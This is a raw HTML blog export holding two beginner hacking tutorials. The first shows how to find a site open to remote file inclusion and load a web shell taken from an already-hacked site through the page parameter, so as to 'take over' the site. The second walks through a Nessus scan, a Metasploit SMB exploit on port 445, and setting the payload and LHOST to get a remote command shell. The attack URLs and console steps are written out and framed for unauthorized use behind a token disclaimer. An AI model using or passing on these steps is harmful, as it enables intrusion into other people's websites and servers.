<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Step1:find the vuln site.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then place ../ at the end of url (remove the
content in page=) like this<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Ex:www.site.com/somefile.php?page=../<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">If it shows some kind of error like :: </span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-size: 13.5pt; line-height: 115%;">Warning</span></b></span><span class="apple-style-span"><span style="background: white; color: black; font-size: 13.5pt; line-height: 115%;">: file(../) [<a href="http://www.cbspk.com/v2/function.file"><span style="color: black;">function.file</span></a>]:
failed to open stream: Permission denied in<b>\\systemname\</b></span><b>users\ in
line</b><span>.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCprHmuiuB78J0SyuYLLRW_Yw_TebOdO4vXd58cWB8vLukhLO_VIXtTBMKLuO3TAYtVM3hyphenhyphen6f7umyBhyqaRBfLCZQ0dSWEfLslHG9sDZqZkXTUeXtadSloZOgICfWPMPexWJYPrKLvCUA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCprHmuiuB78J0SyuYLLRW_Yw_TebOdO4vXd58cWB8vLukhLO_VIXtTBMKLuO3TAYtVM3hyphenhyphen6f7umyBhyqaRBfLCZQ0dSWEfLslHG9sDZqZkXTUeXtadSloZOgICfWPMPexWJYPrKLvCUA/s640/1.png" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then it is vuln to RFI.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Sometimes if you are lucky directly check with
inserting the other url .<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Ex:www.site.com/file.php?page=<b>www.google.com</b><o:p></o:p></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAlP_sjEI1t9xJ6y0J3WWXqUgmY_7gRi5TSaIdDf8kqm9a3zRTVddQV12vD8b4bKSVBwyYV7g-CK5AEtkAQ_UE32-RuyO5A32xEg_g-yy2uMDpCATuMl6SHye9PksCjctKMmEcYPxLRD0/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAlP_sjEI1t9xJ6y0J3WWXqUgmY_7gRi5TSaIdDf8kqm9a3zRTVddQV12vD8b4bKSVBwyYV7g-CK5AEtkAQ_UE32-RuyO5A32xEg_g-yy2uMDpCATuMl6SHye9PksCjctKMmEcYPxLRD0/s640/2.png" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Tats it now to take over this site all u need is
a <b>SHELL</b>. A shell is like a unauthorized
backdoor control panel of website.and it should be in the .txt extension</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> (* <b>im not responsible for any of your actions
, for education purpose only</b>.*)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now put in the url like :: www.site.com/file.php?id=http://www.site.com/shell.txt<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">This shell.txt comes from other site which u have
already hacked and uploaded the txt file.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">You will find like this :::tada !<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2DqXS2bnCwvzJ_W-K5ITtZIIio_8kqC5VYbh5efv5EvffuKZPQV-QpbdWoTho3t8nM9xrjQCrlB4BPN-i6_42s_lh_rVCOeEJ3kD-kFAKCLSvXvHbIhA7qYwLemxVINBNLDD2BRMijkM/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2DqXS2bnCwvzJ_W-K5ITtZIIio_8kqC5VYbh5efv5EvffuKZPQV-QpbdWoTho3t8nM9xrjQCrlB4BPN-i6_42s_lh_rVCOeEJ3kD-kFAKCLSvXvHbIhA7qYwLemxVINBNLDD2BRMijkM/s640/3.png" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-84179518983619695932011-10-15T04:38:00.000-07:002011-10-25T01:52:01.672-07:00Metasploit Basic exploiting for new Starters<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div align="center">
<br />
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in 0in; mso-yfti-tbllook: 1184; width: 70.0%;">
<tbody>
<tr>
<td style="padding: 0in 0in 0in 0in;"></td>
</tr>
</tbody></table>
</div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<br /></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableLightShading" style="border-collapse: collapse; border: none; mso-border-bottom-alt: solid black 1.0pt; mso-border-bottom-themecolor: text1; mso-border-top-alt: solid black 1.0pt; mso-border-top-themecolor: text1; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 100.96%;">
<tbody>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: none; border-right: none; border-top: solid black 1.0pt; mso-border-bottom-themecolor: text1; mso-border-top-themecolor: text1; padding: 0in 5.4pt 0in 5.4pt; width: 100.0%;" valign="top" width="100%"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; mso-yfti-cnfc: 5;">
<b><span style="color: #4f81bd; font-family: 'Times New Roman', serif; font-size: 12pt;">SCANNED
WITH NESSUS</span></b><b><span style="color: black; font-family: 'Times New Roman', serif; font-size: 12pt;"> :<o:p></o:p></span></b></div>
</td>
</tr>
<tr>
<td style="background: silver; border: none; mso-background-themecolor: text1; mso-background-themetint: 63; padding: 0in 5.4pt 0in 5.4pt; width: 100.0%;" valign="top" width="100%"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; mso-yfti-cnfc: 68;">
<b><span style="color: black; font-family: 'Times New Roman', serif; font-size: 12pt;">IP : 192.168.*.*<o:p></o:p></span></b></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border: none; mso-border-bottom-themecolor: text1; padding: 0in 5.4pt 0in 5.4pt; width: 100.0%;" valign="top" width="100%"><table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0in; mso-padding-alt: 1.5pt 1.5pt 1.5pt 1.5pt; mso-yfti-tbllook: 1184; width: 100.0%;">
<tbody>
<tr>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"></td>
</tr>
<tr>
<td colspan="2" style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span><br />
<hr align="center" size="2" width="100%" />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span></div>
</td>
</tr>
<tr>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Number of vulnerabilities<o:p></o:p></span></div>
<div align="center">
<table border="0" cellpadding="0" class="MsoNormalTable" style="mso-cellspacing: 1.5pt; mso-yfti-tbllook: 1184; width: 60.0%;">
<tbody>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Open ports : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">29<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">High : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">300<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Medium : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">47<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Low : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">77<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
</div>
</td>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"></td>
</tr>
<tr>
<td colspan="2" style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span><br />
<hr align="center" size="2" width="100%" />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span></div>
</td>
</tr>
<tr>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Remote host information<o:p></o:p></span></div>
<div align="center">
<table border="0" cellpadding="0" class="MsoNormalTable" style="mso-cellspacing: 1.5pt; mso-yfti-tbllook: 1184; width: 60.0%;">
<tbody>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Operating System : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Microsoft
Windows Server (English)<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
</tr>
</tbody></table>
</div>
</td>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<br /></div>
<div align="center">
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in 0in; mso-yfti-tbllook: 1184; width: 70.0%;">
<tbody>
<tr>
<td style="padding: 0in 0in 0in 0in;"></td>
</tr>
</tbody></table>
</div>
<div class="MsoNormal">
<b>Synopsis:</b><br />
The remote host seems to be a VMware virtual machine.<br />
<br />
<b>Description:</b><br />
According to the MAC address of its network adapter, the remote host is a
VMware virtual machine.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<b><u>LIST OF OPEN PORTS:</u></b></div>
<div class="MsoNormal">
<b><u><br /></u></b></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4LIZrZ-JPW3TmA3Z_yVqCunDF3GsG0PIBL5X51cMOsYxxhDpcj7C2wS9y00LBNv4YfjPLhsMgAXzTmsofgLPr7TrOVWPoN-9WwGpjBUwvP4yWeLGbDTNDfS160G_9wp1WHYnTAUx6hX0/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4LIZrZ-JPW3TmA3Z_yVqCunDF3GsG0PIBL5X51cMOsYxxhDpcj7C2wS9y00LBNv4YfjPLhsMgAXzTmsofgLPr7TrOVWPoN-9WwGpjBUwvP4yWeLGbDTNDfS160G_9wp1WHYnTAUx6hX0/s640/11.png" width="640" /></a></div>
<div class="MsoNormal" style="margin-left: -63.0pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: -1.0in;">
<b><u><br /></u></b></div>
<div class="MsoNormal">
<b><u>TESTING WITH
FRAMEWORK:<o:p></o:p></u></b></div>
<div class="MsoNormal">
<b><u>Ex:<o:p></o:p></u></b></div>
<div class="MsoNormal">
Goto metasploit framework</div>
<div class="MsoNormal">
I’ve chosen 445 port since it has got high number of
vulnerabilities.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoYMZPi9Ws0YMzaE960rjJVAatnChfDYeP4qDYqtCddlJbGFe0WjJZy618-qoeyEr5dvz406ux5CM2c4TMiqK0w7z5gJK7b_l8IPLjpQaHNQl4DgCKlnOKkWm1c6FZt43KUrN6ZI5_lD8/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoYMZPi9Ws0YMzaE960rjJVAatnChfDYeP4qDYqtCddlJbGFe0WjJZy618-qoeyEr5dvz406ux5CM2c4TMiqK0w7z5gJK7b_l8IPLjpQaHNQl4DgCKlnOKkWm1c6FZt43KUrN6ZI5_lD8/s640/12.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal" style="margin-left: -1.0in;">
<br /></div>
<div class="MsoNormal">
Now we choose the vulnerability with id :19408 .</div>
<div class="MsoNormal">
Now we got to framework and search for the exploit
corresponding to the above vulnerability.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC6sZPDjq2mSBUasSnf7-Mg5LA_BXG4QPLqEtKWGkZmb1cn71ZJ0hOhbe3_f_TZdoT-qQJIoPPyjiJE9UYHJsRDtT3479bMhN0hdMzpHtusGX7ZgyFwFclICNF6JPEmMu1QEekqPahE80/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC6sZPDjq2mSBUasSnf7-Mg5LA_BXG4QPLqEtKWGkZmb1cn71ZJ0hOhbe3_f_TZdoT-qQJIoPPyjiJE9UYHJsRDtT3479bMhN0hdMzpHtusGX7ZgyFwFclICNF6JPEmMu1QEekqPahE80/s640/13.png" width="640" /></a></div>
<div class="MsoNormal" style="margin-left: -1.0in;">
<br /></div>
<div class="MsoNormal">
We choose the above exploit:</div>
<div class="MsoNormal">
Ex:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCL8Z9jWUgFXSka_9HTpXyLIOGF3k9k1cEdcBaEneVyPvSAEzBuuVyu_70a7_DYJlflDRZZPwMM7jYVK4C6p86CWBMxnIjjmxCXgwNr_UhYYBI3SKvfdtXGuPxMeIV_B0q_cpPGEKxvb0/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCL8Z9jWUgFXSka_9HTpXyLIOGF3k9k1cEdcBaEneVyPvSAEzBuuVyu_70a7_DYJlflDRZZPwMM7jYVK4C6p86CWBMxnIjjmxCXgwNr_UhYYBI3SKvfdtXGuPxMeIV_B0q_cpPGEKxvb0/s400/14.png" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Now type >show options to see the target host is set or
not.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p> </o:p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPMT6daFjd91sg_D6hIm9yjS4qgbBXdFvvjMQi7n3OYJ5F_hYCtl_wnGInhh3It_G5zMKiDg8FmVFedTfrZdi2IH8h43yr0G9DEdgmxmEX8dGK4pguAhi_ZYlbjm7H87B2roUw3Lpo92Y/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPMT6daFjd91sg_D6hIm9yjS4qgbBXdFvvjMQi7n3OYJ5F_hYCtl_wnGInhh3It_G5zMKiDg8FmVFedTfrZdi2IH8h43yr0G9DEdgmxmEX8dGK4pguAhi_ZYlbjm7H87B2roUw3Lpo92Y/s640/15.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
As you can see there is no target set ,so now we set the target below:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7xV9xvKHomMYCO2ohplQEWRjYpARZDNBfGyKTALR5t-jQDrMRSIztb2h5QlGx_XpGr5naZeHnpPdoj45r-NbWwhttnSHROBuzayZsFnMCsFVr5ZTZEO1bEM0-Dj9FHtbee208WlEtCDc/s1600/16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7xV9xvKHomMYCO2ohplQEWRjYpARZDNBfGyKTALR5t-jQDrMRSIztb2h5QlGx_XpGr5naZeHnpPdoj45r-NbWwhttnSHROBuzayZsFnMCsFVr5ZTZEO1bEM0-Dj9FHtbee208WlEtCDc/s400/16.png" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The target should to 0 as it is given it works against
windows 2***. :</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgviQzQBsNDsUMNQKv5TyLiXMOAnMp0QYZoZaDXSUsJ1cWwTcm_FgRNxCULQwLDmhdVxwrGSOQpV95GptQ77uwO9Bq5SRuzD5QLfoX3GYxdPdq2-Y0AbK8GB8hUJdI6-VZv6bJ0nHRk9OI/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgviQzQBsNDsUMNQKv5TyLiXMOAnMp0QYZoZaDXSUsJ1cWwTcm_FgRNxCULQwLDmhdVxwrGSOQpV95GptQ77uwO9Bq5SRuzD5QLfoX3GYxdPdq2-Y0AbK8GB8hUJdI6-VZv6bJ0nHRk9OI/s1600/17.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTvaNuhsHkHCWwOzH4aggj8keMpLnUMY_26drVw7VTu7RoAP8UGjgipecY9x1vrt8Pvh68TiAJBFCuW0ELoMi0LYIqIjMWvqH1ODEaTuf9ujHX3VVL87PvhArSUQLTUhW5oBxIDlhDM0/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTvaNuhsHkHCWwOzH4aggj8keMpLnUMY_26drVw7VTu7RoAP8UGjgipecY9x1vrt8Pvh68TiAJBFCuW0ELoMi0LYIqIjMWvqH1ODEaTuf9ujHX3VVL87PvhArSUQLTUhW5oBxIDlhDM0/s400/18.png" width="400" /></a></div>
<div class="MsoNormal">
---------------------------------------------</div>
<div class="MsoNormal">
Now we select the payloads :</div>
<div class="MsoNormal">
To see the payloads type :</div>
<div class="MsoNormal">
>show payloads.</div>
<div class="MsoNormal">
To set the payload see below:</div>
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0in 0in 1.0pt 0in;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
<br /></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikd74VzHU5f6VqPVOk1uKXIivK-3ofdovNzKj-0WNYr8sV9CB0LRjXMtjAf8XSXhg_2oc4Ynvc4-k5fyNGp1gq8Af8HD7-m9Sq0A0xDg20zDi2L51V4q0xbCjgQjtV2bgwcwdbxyH0BF8/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikd74VzHU5f6VqPVOk1uKXIivK-3ofdovNzKj-0WNYr8sV9CB0LRjXMtjAf8XSXhg_2oc4Ynvc4-k5fyNGp1gq8Af8HD7-m9Sq0A0xDg20zDi2L51V4q0xbCjgQjtV2bgwcwdbxyH0BF8/s640/19.png" width="640" /></a></div>
</div>
<div class="MsoNormal">
To see if our local ip or host is set or not type:</div>
<div class="MsoNormal">
>show options</div>
<div class="MsoNormal">
U will see this :</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Op3WUjED43cZ6PH3_kYuzdZox3CaCMLaOm_vWu_HFlWfsnx-5Es099QQyEnWA-hHtx3sl9AP0CIIFU7ga2Lp6A9PlG_nclY8b6drHP9ZvsYDRAhgyC_xX7fr94ZfqStmluOTR9S2jfw/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Op3WUjED43cZ6PH3_kYuzdZox3CaCMLaOm_vWu_HFlWfsnx-5Es099QQyEnWA-hHtx3sl9AP0CIIFU7ga2Lp6A9PlG_nclY8b6drHP9ZvsYDRAhgyC_xX7fr94ZfqStmluOTR9S2jfw/s640/20.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
As u can observe that<b> LHOST</b> is not set that is our local ip
:</div>
<div class="MsoNormal">
To set it . type :</div>
<div class="MsoNormal">
<br /></div>
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0in 0in 1.0pt 0in;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
><b>set LHOST <host ip></b></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in;">
<br /></div>
</div>
<div class="MsoNormal">
Now type </div>
<div class="MsoNormal">
>exploit </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4sbyu2WG9cJvbezxeEFOiGn3SIKfCsS3Vf7YFWNlWJpfeQIrw01avB9il5uj3-zMdgwaaQF56Uq7ovwnryVtgGWqqq1Zo4rbp8gSDFbr3LfwstSwXMmP8lxXTlIsSzsPi4d8UWrLf9iM/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4sbyu2WG9cJvbezxeEFOiGn3SIKfCsS3Vf7YFWNlWJpfeQIrw01avB9il5uj3-zMdgwaaQF56Uq7ovwnryVtgGWqqq1Zo4rbp8gSDFbr3LfwstSwXMmP8lxXTlIsSzsPi4d8UWrLf9iM/s640/21.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Hurrayy…!</div>
<div class="MsoNormal">
U will be getting the target host command shell.</div>
<div class="MsoNormal">
Njoy.!</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
========================================================================<br />
<br />
<span class="Apple-style-span" style="background-color: #f6f3ef; color: #555555; font-family: Arial, Verdana; font-size: 12px;"></span><br />
<h3 class="post-title entry-title" style="color: #373736; font-family: Arial, Helvetica, sans-serif; font-size: 24px; font-weight: bold; line-height: 24px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
